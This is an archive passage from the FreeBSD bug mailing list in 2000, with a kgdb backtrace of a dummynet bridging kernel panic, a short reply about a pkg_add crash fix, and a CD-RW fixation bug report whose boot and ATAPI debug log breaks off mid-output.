"Lachlan O'Dea" Subject: Re: kern/22224: ipfw pipe command causes kernel panic Reply-To: "Lachlan O'Dea" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR kern/22224; it has been noted by GNATS. From: "Lachlan O'Dea" To: freebsd-gnats-submit@FreeBSD.org Cc: jeff+freebsd@spotlife.com Subject: Re: kern/22224: ipfw pipe command causes kernel panic Date: Mon, 30 Oct 2000 16:53:13 +1100 I've got exactly the same problem. The troublesome dummynet code is only included when using bridging. I have one_pass set to 1. morannon /sys/netinet % uname -a FreeBSD morannon.mel.vet.com.au 4.1-STABLE FreeBSD 4.1-STABLE #0: Thu Sep 21 13:19:08 EST 2000 lodea@morannon.mel.vet.com.au:/usr/site/freebsdsrc/src/sys/compile/MORANNON i386 Script started on Mon Oct 30 16:22:43 2000 GNU gdb 4.18 Copyright 1998 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-unknown-freebsd"... IdlePTD 3059712 initial pcb at 26c340 panicstr: page fault panic messages: --- Fatal trap 12: page fault while in kernel mode fault virtual address = 0xc055064a fault code = supervisor write, page not present instruction pointer = 0x8:0xc01545af stack pointer = 0x10:0xc024cdfc frame pointer = 0x10:0xc024ce08 code segment = base 0x0, limit 0xfffff, type 0x1b = DPL 0, pres 1, def32 1, gran 1 processor eflags = interrupt enabled, resume, IOPL = 0 current process = Idle interrupt mask = net trap number = 12 panic: page fault syncing disks... 2 1 done Uptime: 37d14h24m2s dumping to dev #ad/0x20001, offset 76272 dump ata0: resetting devices .. done 32 31 30 29 28 27 26 25 24 23 22 21 20 19 18 17 16 15 14 13 12 11 10 9 8 7 6 5 4 3 2 1 --- #0 boot (howto=256) at ../../kern/kern_shutdown.c:302 302 dumppcb.pcb_cr3 = rcr3(); (kgdb) where #0 boot (howto=256) at ../../kern/kern_shutdown.c:302 #1 0xc013ae0c in poweroff_wait (junk=0xc02441cf, howto=0) at ../../kern/kern_shutdown.c:552 #2 0xc020ec61 in trap_fatal (frame=0xc024cdbc, eva=3226797642) at ../../i386/i386/trap.c:951 #3 0xc020e939 in trap_pfault (frame=0xc024cdbc, usermode=0, eva=3226797642) at ../../i386/i386/trap.c:844 #4 0xc020e4f3 in trap (frame={tf_fs = 16, tf_es = 16, tf_ds = 16, tf_edi = 6422528, tf_esi = 0, tf_ebp = -1071329784, tf_isp = -1071329816, tf_ebx = -1063740608, tf_edx = 521802, tf_ecx = 0, tf_eax = -1068691456, tf_trapno = 12, tf_err = 2, tf_eip = -1072347729, tf_cs = 8, tf_eflags = 66066, tf_esp = -1063740608, tf_ss = 0}) at ../../i386/i386/trap.c:443 #5 0xc01545af in m_free (m=0xc0989b40) at ../../kern/uipc_mbuf.c:515 #6 0xc015537e in m_pullup (n=0xc0989b40, len=14) at ../../kern/uipc_mbuf.c:981 #7 0xc018588d in transmit_event (pipe=0xc0aad800) at ../../netinet/ip_dummynet.c:407 #8 0xc0185ac7 in ready_event (q=0xc0a03580) at ../../netinet/ip_dummynet.c:525 #9 0xc0185eff in dummynet (unused=0x0) at ../../netinet/ip_dummynet.c:660 #10 0xc01401f1 in softclock () at ../../kern/kern_timeout.c:131 (kgdb) up 7 #7 0xc018588d in transmit_event (pipe=0xc0aad800) at ../../netinet/ip_dummynet.c:407 407 if (m->m_len < ETHER_HDR_LEN (kgdb) print *m $1 = {m_hdr = {mh_next = 0xc04e2700, mh_nextpkt = 0x0, mh_data = 0xc0842cc0 "ðtMÀ", mh_len = 0, mh_type = 14, mh_flags = 1}, M_dat = {MH = {MH_pkthdr = {rcvif = 0x135d1406, len = 0, header = 0xc07db800 "", csum_flags = 0, csum_data = 0, aux = 0x0}, MH_dat = {MH_ext = {ext_buf = 0x0, ext_free = 0, ext_size = 0, ext_ref = 0}, MH_databuf = '\000' , "@O\212À\000ù À\200É\237ÀÈã\224À\000\000\000\000À$ûÃ@\031éÃ@$ûÃ\000\021es_ES.DIS_8859-15ep.co.gz\000\000\000\000\000\000Ò\235ÀP\232~À\000.\225ÀH\022¢À\000\000\000\000@ÔêÃ\200|ûÃÀÓêÃ\000\typ_main.ccay.tzanywhere.al\000\000\000\000\000¾\234À\000Ó\226À\200Ô¢À\210¿\227À\200Ô¢À\200µìÃ\000qõÃ\000µìÃ\000\tlog2.3.gz.gz\000\000\\ã}Àgz\000\000.3.gz\000"...}}, M_databuf = "\006\024]\023\000\000\000\000\000¸}À", '\000' , "@O\212À\000ù À\200É\237ÀÈã\224À \000\000\000\000À$ûÃ@\031éÃ@$ûÃ\000\021es_ES.DIS_8859-15ep.co.gz\000\000\000\000\000\000Ò\235ÀP\232~À\000.\225ÀH\022¢À\000\000\000\000@ÔêÃ\200|ûÃÀÓêÃ\000\typ_main.ccay.tzanywhere.al\000\000\000\000\000¾\234À\000Ó\226À\200Ô¢À\210¿\227À\200Ô¢À\200µìÃ\000qõÃ\000µìÃ\000\tlog2.3.gz.gz\000\000\\ã"...}} (kgdb) Script done on Mon Oct 30 16:23:03 2000 In transmit_event, the bridging code passes pkt to m_pullup as if it was an mbuf. I think pkt is not a valid mbuf, so m_pullup is panicing. The only thing I could see that looked odd is that the M_EXT flag is set, but m_ext.ext_buf is NULL. I'm going to continue to investigate, but I don't know enough about the kernel's networking code to make much sense of this. Hopefully Luigi can find time to have a look at this and save us. -- Lachlan O'Dea Computer Associates Pty Ltd Webmaster Vet - Anti-Virus Software http://www.vet.com.au/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Oct 30 0:50:45 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 7478A37B4C5; Mon, 30 Oct 2000 00:50:42 -0800 (PST) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id JAA97460; Mon, 30 Oct 2000 09:50:41 +0100 (CET) (envelope-from des@ofug.org) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: billf@FreeBSD.org Cc: freebsd-bugs@FreeBSD.org Subject: Re: bin/22401: pkg_add -r does a segmentation fault References: <200010292348.PAA50084@freefall.freebsd.org> From: Dag-Erling Smorgrav Date: 30 Oct 2000 09:50:40 +0100 In-Reply-To: billf@FreeBSD.org's message of "Sun, 29 Oct 2000 15:48:52 -0800 (PST)" Message-ID: Lines: 16 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.4 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org billf@FreeBSD.org writes: > Responsible-Changed-From-To: freebsd-bugs->des > Responsible-Changed-By: billf > Responsible-Changed-When: Sun Oct 29 15:47:59 PST 2000 > Responsible-Changed-Why: > Dag-Erling already committed a fix (of a fix) in -current, > I suppose this serves as a reminder to merge before 4.2-RELEASE Definitely, but there are other issues too and I'm not sure I dare MFC everything. The alternative is backing out some of what's already been MFCed (specifically, the FTP connection caching fixes), since pkg_add breaks because of assumptions that connection caching invalidate. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Oct 30 1:10:16 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id E293837B4C5 for ; Mon, 30 Oct 2000 01:10:01 -0800 (PST) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id BAA63177; Mon, 30 Oct 2000 01:10:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from ardbeg.komma.de (ardbeg.komma.de [194.77.233.18]) by hub.freebsd.org (Postfix) with ESMTP id 1AC9337B479 for ; Mon, 30 Oct 2000 01:08:23 -0800 (PST) Received: (from pmh@localhost) by ardbeg.komma.de (8.11.1/8.11.1) id e9U98CE01337; Mon, 30 Oct 2000 10:08:12 +0100 (CET) (envelope-from pmh) Message-Id: <200010300908.e9U98CE01337@ardbeg.komma.de> Date: Mon, 30 Oct 2000 10:08:12 +0100 (CET) From: pmh@komma.de To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: kern/22411: ata/acd and TEAC CD-W54EK - unable to fixate disk Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 22411 >Category: kern >Synopsis: CD-RW drive works mostly, but can't fixate >Confidential: no >Severity: serious >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Oct 30 01:10:01 PST 2000 >Closed-Date: >Last-Modified: >Originator: Patrick M. Hausen >Release: FreeBSD 4.1.1-STABLE i386, 20001029 >Organization: private Site >Environment: Kernel config: device ata device atadisk # ATA disk drives device atapicd # ATAPI CDROM drives device atapifd # ATAPI floppy drives device atapist # ATAPI tape drives options ATA_ENABLE_ATAPI_DMA Enabled ATA_DEBUG, ATAPI_DEBUG, ACD_DEBUG. Dmesg while booting: Copyright (c) 1992-2000 The FreeBSD Project. Copyright (c) 1979, 1980, 1983, 1986, 1988, 1989, 1991, 1992, 1993, 1994 The Regents of the University of California. All rights reserved. FreeBSD 4.1.1-STABLE #0: Mon Oct 30 09:03:23 CET 2000 root@ardbeg.komma.de:/usr/src/sys/compile/ARDBEG Calibrating clock(s) ... TSC clock: 198657548 Hz, i8254 clock: 1193139 Hz CLK_USE_I8254_CALIBRATION not specified - using default frequency Timecounter "i8254" frequency 1193182 Hz CLK_USE_TSC_CALIBRATION not specified - using old calibration method CPU: Pentium Pro (198.67-MHz 686-class CPU) Origin = "GenuineIntel" Id = 0x619 Stepping = 9 Features=0xfbff real memory = 134217728 (131072K bytes) Physical memory chunk(s): 0x00001000 - 0x0009efff, 647168 bytes (158 pages) 0x00313000 - 0x07ff7fff, 130961408 bytes (31973 pages) avail memory = 127520768 (124532K bytes) bios32: Found BIOS32 Service Directory header at 0xc00fd9e0 bios32: Entry = 0xfd9f0 (c00fd9f0) Rev = 0 Len = 1 pcibios: PCI BIOS entry at 0xda11 pnpbios: Found PnP BIOS data at 0xc00fa020 pnpbios: Entry = f0000:a120 Rev = 1.0 Other BIOS signatures found: ACPI: 00000000 Preloaded elf kernel "kernel" at 0xc02fa000. Pentium Pro MTRR support enabled pci_open(1): mode 1 addr port (0x0cf8) is 0x80000058 pci_open(1a): mode1res=0x80000000 (0x80000000) pci_cfgcheck: device 0 [class=060000] [hdr=00] is there (id=12378086) apm0: on motherboard apm: found APM BIOS v1.2, connected at v1.2 npx0: on motherboard npx0: INT 16 interface pci_open(1): mode 1 addr port (0x0cf8) is 0x00000000 pci_open(1a): mode1res=0x80000000 (0x80000000) pci_cfgcheck: device 0 [class=060000] [hdr=00] is there (id=12378086) pcib0: on motherboard found-> vendor=0x8086, dev=0x1237, revid=0x02 class=06-00-00, hdrtype=0x00, mfdev=0 subordinatebus=0 secondarybus=0 found-> vendor=0x8086, dev=0x1229, revid=0x01 class=02-00-00, hdrtype=0x00, mfdev=0 subordinatebus=0 secondarybus=0 intpin=a, irq=11 map[10]: type 1, range 32, base ffbea000, size 12 map[14]: type 1, range 32, base 0000ff40, size 5 map[18]: type 1, range 32, base ff800000, size 20 found-> vendor=0x8086, dev=0x7000, revid=0x01 class=06-01-00, hdrtype=0x00, mfdev=1 subordinatebus=0 secondarybus=0 found-> vendor=0x8086, dev=0x7010, revid=0x00 class=01-01-80, hdrtype=0x00, mfdev=0 subordinatebus=0 secondarybus=0 map[20]: type 1, range 32, base 0000ffa0, size 4 found-> vendor=0x9004, dev=0x8078, revid=0x00 class=01-00-00, hdrtype=0x00, mfdev=0 subordinatebus=0 secondarybus=0 intpin=a, irq=10 map[10]: type 1, range 32, base 0000fc00, size 8 map[14]: type 1, range 32, base ffbef000, size 12 found-> vendor=0x5333, dev=0x88f0, revid=0x00 class=03-00-00, hdrtype=0x00, mfdev=0 subordinatebus=0 secondarybus=0 intpin=a, irq=11 map[10]: type 1, range 32, base fa000000, size 25 pci0: on pcib0 Correcting Natoma config for non-SMP Correcting Natoma config for non-SMP fxp0: port 0xff40-0xff5f mem 0xff800000-0xff8fffff,0xffbea000-0xffbeafff irq 11 at device 6.0 on pci0 fxp0: Ethernet address 00:a0:c9:49:c1:01 bpf: fxp0 attached isab0: at device 7.0 on pci0 I/O Recovery Timing: 8-bit 1 clocks, 16-bit 1 clocks Extended BIOS: enabled Lower BIOS: enabled Coprocessor IRQ13: enabled Mouse IRQ12: disabled Interrupt Routing: A: IRQ11, B: IRQ10, C: IRQ11, D: disabled MB0: , MB1: isa0: on isab0 atapci0: port 0xffa0-0xffaf at device 7.1 on pci0 ata0: iobase=0x01f0 altiobase=0x03f6 bmaddr=0xffa0 ata0: mask=03 status0=50 status1=7f ata0: mask=03 status0=00 status1=7f ata0: devices = 0x4 ata0: at 0x1f0 irq 14 on atapci0 ata1: iobase=0x0170 altiobase=0x0376 bmaddr=0xffa8 ata1: mask=00 status0=ff status1=ff ata1: probe allocation failed ahc0: port 0xfc00-0xfcff mem 0xffbef000-0xffbeffff irq 10 at device 9.0 on pci0 ahc0: Reading SEEPROM...done. ahc0: Downloading Sequencer Program... 437 instructions downloaded aic7880: Wide Channel A, SCSI Id=7, 16/255 SCBs pci0: (vendor=0x5333, dev=0x88f0) at 11.0 irq 11 Trying Read_Port at 203 CSC0000: start dependant CSC0000: adding dma mask 0x2 CSC0000: adding dma mask 0x9 CSC0000: adding irq mask 0x20 CSC0000: adding io range 0x534-0x537, size=0x4, align=0x4 CSC0000: adding io range 0x388-0x38b, size=0x4, align=0x8 CSC0000: adding io range 0x220-0x22f, size=0x10, align=0x20 CSC0000: start dependant CSC0000: adding dma mask 0xa CSC0000: adding dma mask 0xb CSC0000: adding irq mask 0x9aa0 CSC0000: adding io range 0x534-0xfff, size=0x4, align=0x4 CSC0000: adding io range 0x388-0x38b, size=0x4, align=0x8 CSC0000: adding io range 0x220-0x26f, size=0x10, align=0x20 CSC0000: start dependant CSC0000: adding dma mask 0xb CSC0000: adding irq mask 0x9aa0 CSC0000: adding io range 0x534-0xfff, size=0x4, align=0x4 CSC0000: adding io range 0x388-0x3fb, size=0x4, align=0x8 CSC0000: adding io range 0x220-0x30f, size=0x10, align=0x20 CSC0000: end dependant CSC0001: start dependant CSC0001: adding io range 0x200-0x207, size=0x8, align=0x8 CSC0001: start dependant CSC0001: adding io range 0x208-0x20f, size=0x8, align=0x8 CSC0001: end dependant CSC0010: adding io range 0x120-0xfff, size=0x8, align=0x8 CSC0003: start dependant CSC0003: adding irq mask 0x200 CSC0003: adding io range 0x330-0x331, size=0x2, align=0x8 CSC0003: start dependant CSC0003: adding irq mask 0x9a00 CSC0003: adding io range 0x300-0x3f9, size=0x2, align=0x8 CSC0003: end dependant isa_probe_children: disabling PnP devices isa_probe_children: probing non-PnP devices atkbdc0: at port 0x60,0x64 on isa0 atkbd0: irq 1 on atkbdc0 atkbd: the current kbd controller command byte 0065 atkbd: keyboard ID 0x41ab (2) kbdc: RESET_KBD return code:00fa kbdc: RESET_KBD status:00aa kbd0: atkbd0, AT 101/102 (2), config:0x0, flags:0x3d0000 psm0: current command byte:0065 kbdc: TEST_AUX_PORT status:0000 kbdc: RESET_AUX return code:00fa kbdc: RESET_AUX status:00aa kbdc: RESET_AUX ID:0000 psm: status 00 02 64 psm: status 90 03 3c psm: status 90 03 3c psm: status 90 03 3c psm: data 08 00 00 psm: status 00 00 28 psm: status 00 02 64 psm: data 08 00 00 psm: status 00 02 64 psm0: irq 12 on atkbdc0 psm0: model Generic PS/2 mouse, device ID 0-00, 3 buttons psm0: config:00000000, flags:00000000, packet size:3 psm0: syncmask:c0, syncbits:00 vga0: at port 0x3c0-0x3df iomem 0xa0000-0xbffff on isa0 fb0: vga0, vga, type:VGA (5), flags:0x7007f fb0: port:0x3c0-0x3df, crtc:0x3d4, mem:0xa0000 0x20000 fb0: init mode:24, bios mode:3, current mode:24 fb0: window:0xc00b8000 size:32k gran:32k, buf:0 size:32k VGA parameters upon power-up 50 18 10 00 00 00 03 00 02 67 5f 4f 50 82 55 81 bf 1f 00 4f 0d 0e 00 00 06 40 9c 8e 8f 28 1f 96 b9 a3 ff 00 01 02 03 04 05 14 07 38 39 3a 3b 3c 3d 3e 3f 0c 00 0f 08 00 00 00 00 00 10 0e 00 ff VGA parameters in BIOS for mode 24 50 18 10 00 10 00 03 00 02 67 5f 4f 50 82 55 81 bf 1f 00 4f 0d 0e 00 00 00 00 9c 8e 8f 28 1f 96 b9 a3 ff 00 01 02 03 04 05 14 07 38 39 3a 3b 3c 3d 3e 3f 0c 00 0f 08 00 00 00 00 00 10 0e 00 ff EGA/VGA parameters to be used for mode 24 50 18 10 00 10 00 03 00 02 67 5f 4f 50 82 55 81 bf 1f 00 4f 0d 0e 00 00 00 00 9c 8e 8f 28 1f 96 b9 a3 ff 00 01 02 03 04 05 14 07 38 39 3a 3b 3c 3d 3e 3f 0c 00 0f 08 00 00 00 00 00 10 0e 00 ff sc0: on isa0 sc0: VGA <16 virtual consoles, flags=0x200> sc0: fb0, kbd0, terminal emulator: sc (syscons terminal) fdc0: at port 0x3f0-0x3f5,0x3f7 irq 6 drq 2 on isa0 fdc0: FIFO enabled, 8 bytes threshold fd0: <1440-KB 3.5" drive> on fdc0 drive 0 sio0: irq maps: 0x261 0x271 0x261 0x261 sio0 at port 0x3f8-0x3ff irq 4 flags 0x10 on isa0 sio0: type 16550A sio1: irq maps: 0x261 0x269 0x261 0x261 sio1 at port 0x2f8-0x2ff irq 3 on isa0 sio1: type 16550A sio2: irq maps: 0x261 0x8261 0x261 0x261 sio2 at port 0x3e8-0x3ef irq 15 on isa0 sio2: type 16550A ppc0: parallel port found at 0x378 ppc0: using extended I/O port range ppc0: EPP SPP ppc0: at port 0x378-0x37f irq 7 on isa0 ppc0: Generic chipset (EPP/NIBBLE) in COMPATIBLE mode lpt0: on ppbus0 lpt0: Interrupt-driven port isa_probe_children: probing PnP devices pcm0: at port 0x534-0x537,0x388-0x38b,0x220-0x22f irq 5 drq 1,0 on isa0 pcm: setmap 30000, ff00; 0xc8508000 -> 30000 pcm: setmap 40000, ff00; 0xc8518000 -> 40000 joy0: at port 0x200-0x207 on isa0 unknown: failed to probe at port 0x120-0x127 on isa0 unknown: failed to probe at port 0x330-0x331 irq 9 on isa0 ata0: unwanted interrupt 1 status = ff BIOS Geometries: 0:03fe3f20 0..1022=1023 cylinders, 0..63=64 heads, 1..32=32 sectors 1:03fe3f20 0..1022=1023 cylinders, 0..63=64 heads, 1..32=32 sectors 0 accounted for Device configuration finished. bpf: lo0 attached ata0-master: ata_command: addr=01f0, cmd=a1, c=0, h=0, s=0, count=0, feature=0, flags=02 ata0-master: piomode=4 dmamode=2 udmamode=-1 dmaflag=1 ata0-master: ata_command: addr=01f0, cmd=ef, c=0, h=0, s=0, count=34, feature=3, flags=03 ata0-master: success setting WDMA2 on PIIX3 chip (null): queueing MODE_SENSE_BIG ccb = 5a-00-2a-00-00-00-00-00-1e-00-00-00-00-00-00-00 (null): starting MODE_SENSE_BIG ccb = 5a-00-2a-00-00-00-00-00-1e-00-00-00-00-00-00-00 ata0-master: ata_command: addr=01f0, cmd=a0, c=30, h=0, s=0, count=0, feature=0, flags=01 (null): starting REQUEST_SENSE ccb = 03-00-00-00-12-00-00-00-00-00-00-00-00-00-00-00 ata0-master: ata_command: addr=01f0, cmd=a0, c=18, h=0, s=0, count=0, feature=0, flags=01 (null): finished REQUEST_SENSE acd: mode sense 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 (null): queueing MODE_SENSE_BIG ccb = 5a-00-2a-00-00-00-00-00-1e-00-00-00-00-00-00-00 (null): starting MODE_SENSE_BIG ccb = 5a-00-2a-00-00-00-00-00-1e-00-00-00-00-00-00-00 ata0-master: ata_command: addr=01f0, cmd=a0, c=30, h=0, s=0, count=0, feature=0, flags=01 (null): finished MODE_SENSE_BIG acd: mode sense 00-1c-70-00-00-00-00-00-2a-14-07-07-71-7f-29-23-16-0d-01-00-05-00-16-0d-00-00-02-c2-02-c2 acd0: CD-RW drive at ata0 as master acd0: read 5512KB/s (5512KB/s) write 689KB/s (689KB/s), 1280KB buffer, WDMA2 acd0: Reads: CD-R, CD-RW, CD-DA stream, packet acd0: Writes: CD-R, CD-RW, test write acd0: Audio: play, 256 volume levels acd0: Mechanism: ejectable tray acd0: Medium: no/blank disc inside, unlocked Waiting 2 seconds for SCSI devices to settle (noperiph:ahc0:0:-1:-1): SCSI bus reset delivered. 0 SCBs aborted. (probe5:ahc0:0:5:0): INQUIRY. CDB: 12 1 80 0 ff 0 (probe5:ahc0:0:5:0): ILLEGAL REQUEST asc:24,0 (probe5:ahc0:0:5:0): Invalid field in CDB sks:c8,1 (ahc0:A:5:0): Sending SDTR period c, offset f (ahc0:A:5:0): Received SDTR period 19, offset 8 Filtered to period 19, offset 8 ahc0: target 5 synchronous at 10.0MHz, offset = 0x8 (ahc0:A:5:0): Sending SDTR period 19, offset 8 (ahc0:A:5:0): Received SDTR period 19, offset 8 Filtered to period 19, offset 8 (ahc0:A:0:0): Sending WDTR 1 (ahc0:A:0:0): Received WDTR 1 filtered to 1 ahc0: target 0 using 16bit transfers (ahc0:A:0:0): Sending SDTR period c, offset 8 (ahc0:A:0:0): Received SDTR period c, offset 8 Filtered to period c, offset 8 ahc0: target 0 synchronous at 20.0MHz, offset = 0x8 (ahc0:A:1:0): Sending WDTR 1 (ahc0:A:1:0): Received WDTR 1 filtered to 1 ahc0: target 1 using 16bit transfers (ahc0:A:1:0): Sending SDTR period c, offset 8 (ahc0:A:1:0): Received SDTR period c, offset 8 Filtered to period c, offset 8 ahc0: target 1 synchronous at 20.0MHz, offset = 0x8 Creating DISK da0 Creating DISK da1 Creating DISK cd0 pass0 at ahc0 bus 0 target 0 lun 0 pass0: Fixed Direct Access SCSI-2 device pass0: Serial Number B20L8710 pass0: 40.000MB/s transfers (20.000MHz, offset 8, 16bit) pass1 at ahc0 bus 0 target 1 lun 0 pass1: Fixed Direct Access SCSI-2 device pass1: Serial Number F26J8854 pass1: 40.000MB/s transfers (20.000MHz, offset 8, 16bit) pass2 at ahc0 bus 0 target 5 lun 0 pass2: Removable CD-ROM SCSI-2 device pass2: 10.000MB/s transfers (10.000MHz, offset 8) (ahc0:A:5:0): Sending SDTR period 19, offset 8 Mounting root from ufs:/dev/da0s1a (ahc0:A:5:0): Received SDTR period 19, offset 8 Filtered to period 19, offset 8 (ahc0:A:5:0): Sending SDTR period 19, offset 8 (ahc0:A:5:0): Received SDTR period 19, offset 8 Filtered to period 19, offset 8 (cd0:ahc0:0:5:0): READ CD RECORDED CAPACITY. CDB: 25 0 0 0 0 0 0 0 0 0 (cd0:ahc0:0:5:0): NOT READY asc:3a,0 (cd0:ahc0:0:5:0): Medium not present cd0 at ahc0 bus 0 target 5 lun 0 cd0: Removable CD-ROM SCSI-2 device cd0: 10.000MB/s transfers (10.000MHz, offset 8) cd0: Attempt to query device size failed: NOT READY, Medium not present da1 at ahc0 bus 0 target 1 lun 0 da1: Fixed Direct Access SCSI-2 device da1: Serial Number F26J8854 da1: 40.000MB/s transfers (20.000MHz, offset 8, 16bit) da1: 2063MB (4226725 512 byte sectors: 64H 32S/T 2063C) da0 at ahc0 bus 0 target 0 lun 0 da0: Fixed Direct Access SCSI-2 device da0: Serial Number B20L8710 da0: 40.000MB/s transfers (20.000MHz, offset 8, 16bit) da0: 2063MB (4226725 512 byte sectors: 64H 32S/T 2063C) da0s1: type 0xa5, start 0, end = 4226724, size 4226725 : OK start_init: trying /sbin/init da1s1: type 0xa5, start 0, end = 4226724, size 4226725 : OK Linux-ELF exec handler installed >Description: The device is recognized by the kernel. Blanking of CD-RW media works, writing tracks seemingly works, fixating doesn't. Same for CD-R media, fixating impossible. >How-To-Repeat: # burncd -f /dev/acd0c blank acd0: queueing PREVENT_ALLOW ccb = 1e-00-00-00-01-00-00-00-00-00-00-00-00-00-00-00 acd0: starting PREVENT_ALLOW ccb = 1e-00-00-00-01-00-00-00-00-00-00-00-00-00-00-00 ata0-master: ata_command: addr=01f0, cmd=a0, c=0, h=0, s=0, count=0, feature=0, flags=01 acd0: starting REQUEST_SENSE ccb = 03-00-00-00-12-00-00-00-00-00-00-00-00-00-00-00 ata0-master: ata_command: addr=01f0, cmd=a0, c=18, h=0, s=0, count=0, feature=0, flags=01 acd0: finished REQUEST_SENSE acd0: queueing TEST_UNIT_READY ccb = 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 acd0: starting TEST_UNIT_READY ccb = 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 ata0-master: ata_command: addr=01f0, cmd=a0, c=0, h=0, s=0, count=0, feature=0, flags=01 acd0: finished TEST_UNIT_READY acd0: queueing TEST_UNIT_READY ccb = 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 acd0: starting TEST_UNIT_READY ccb = 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 ata0-master: ata_command: addr=01f0, cmd=a0, c=0, h=0, s=0, count=0, feature=0, flags=01 acd0: finished TEST_UNIT_READY acd0: queueing READ_TOC ccb = 43-00-00-00-00-00-00-00-0c-00-00-00-00-00-00-00 acd0: starting READ_TOC ccb = 43-00-00-00-00-00-00-00-0c-00-00-00-00-00-00-00 ata0-master: ata_command: addr=01f0, cmd=a0, c=12, h=0, s=0, count=0, feature=0, flags=01 acd0: starting REQUEST_SENSE ccb = 03-00-00-00-12-00-00-00-00-00-00-00-00-00-00-00 ata0-master: ata_command: addr=01f0, cmd=a0, c=18, h=0, s=0, count=0, feature=0, flags=01 acd0: READ_TOC - ILLEGAL REQUEST asc=24 ascq=00 error=04 acd0: finished REQUEST_SENSE acd0: queueing PREVENT_ALLOW ccb = 1e-00-00-00-01-00-00-00-00-00-00-00-00-00-00-00 acd0: starting PREVENT_ALLOW ccb = 1e-00-00-00-01-00-00-00-00-00-00-00-00-00-00-00 ata0-master: ata_command: addr=01f0, cmd=a0, c=0, h=0, s=0, count=0, feature=0, flags=01 acd0: finished PREVENT_ALLOW acd0: queueing SET_SPEED ccb = bb-00-ff-ff-00-b1-00-00-00-00-00-00-00-00-00-00 acd0: starting SET_SPEED ccb = bb-00-ff-ff-00-b1-00-00-00-00-00-00-00-00-00-00 ata0-master: ata_command: addr=01f0, cmd=a0, c=0, h=0, s=0, count=0, feature=0, flags=01 acd0: finished SET_SPEED acd0: queueing BLANK_CMD ccb = a1-01-00-00-00-00-00-00-00-00-00-00-00-00-00-00 acd0: starting BLANK_CMD ccb = a1-01-00-00-00-00-00-00-00-00-00-00-00-00-00-00 ata0-master: ata_command: addr=01f0, cmd=a0, c=0, h=0, s=0, count=0, feature=0, flags=01 acd0: finished BLANK_CMD acd0: queueing TEST_UNIT_READY ccb = 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 acd0: starting TEST_UNIT_READY ccb = 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 ata0-master: ata_command: addr=01f0, cmd=a0, c=0, h=0, s=0, count=0, feature=0, flags=01 acd0: finished TEST_UNIT_READY acd0: queueing READ_TOC ccb = 43-00-00-00-00-00-00-00-0c-00-00-00-00-00-00-00 acd0: starting READ_TOC ccb = 43-00-00-00-00-00-00-00-0c-00-00-00-00-00-00-00 ata0-master: ata_command: addr=01f0, cmd=a0, c=12, h=0, s=0, count=0, feature=0, flags=01 acd0: starting REQUEST_SENSE ccb = 03-00-00-00-12-00-00-00-00-00-00-00-00-00-00-00 ata0-master: ata_command: addr=01f0, cmd=a0, c=18, h=0, s=0, count=0, feature=0, flags=01 acd0: READ_TOC - ILLEGAL REQUEST asc=24 ascq=00 error=04 acd0: finished REQUEST_SENSE acd0: queueing PREVENT_ALLOW ccb = 1e-00-00-00-01-00-00-00-00-00-00-00-00-00-00-00 acd0: starting PREVENT_ALLOW ccb = 1e-00-00-00-01-00-00-00-00-00-00-00-00-00-00-00 ata0-master: ata_command: addr=01f0, cmd=a0, c=0, h=0, s=0, count=0, feature=0, flags=01 acd0: finished PREVENT_ALLOW acd0: queueing PREVENT_ALLOW ccb = 1e-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 acd0: starting PREVENT_ALLOW ccb = 1e-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 ata0-master: ata_command: addr=01f0, cmd=a0, c=0, h=0, s=0, count=0, feature=0, flags=01 acd0: finished PREVENT_ALLOW # burncd -f /dev/acd0 data test.iso acd0: queueing PREVENT_ALLOW ccb = 1e-00-00-00-01-00-00-00-00-00-00-00-00-00-00-00 acd0: starting PREVENT_ALLOW ccb = 1e-00-00-00-01-00-00-00-00-00-00-00-00-00-00-00 ata0-master: ata_command: addr=01f0, cmd=a0, c=0, h=0, s=0, count=0, feature=0, flags=01 acd0: finished PREVENT_ALLOW acd0: queueing TEST_UNIT_READY ccb = 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 acd0: starting TEST_UNIT_READY ccb = 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 ata0-master: ata_command: addr=01f0, cmd=a0, c=0, h=0, s=0, count=0, feature=0, flags=01 acd0: finished TEST_UNIT_READY acd0: queueing SET_SPEED 